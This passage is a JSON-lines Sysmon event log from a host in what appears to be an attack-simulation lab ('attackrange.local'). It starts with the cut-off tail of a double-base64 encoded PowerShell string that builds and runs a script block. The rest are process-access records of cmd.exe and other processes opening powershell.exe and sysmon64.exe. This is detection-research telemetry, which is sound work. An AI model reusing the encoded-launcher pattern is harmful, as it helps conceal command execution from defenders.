QQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5383,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-0010B8550A00}\r\nSourceProcessId: 4324\r\nSourceThreadId: 4648\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-0010B8550A00}","SourceProcessId":"4324","SourceThreadId":"4648","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001016DC0600}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5384,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nTargetProcessId: 3852\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0313-5F25-0000-001016DC0600}","TargetProcessId":"3852","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5385,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5386,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5387,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5388,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5389,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5390,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 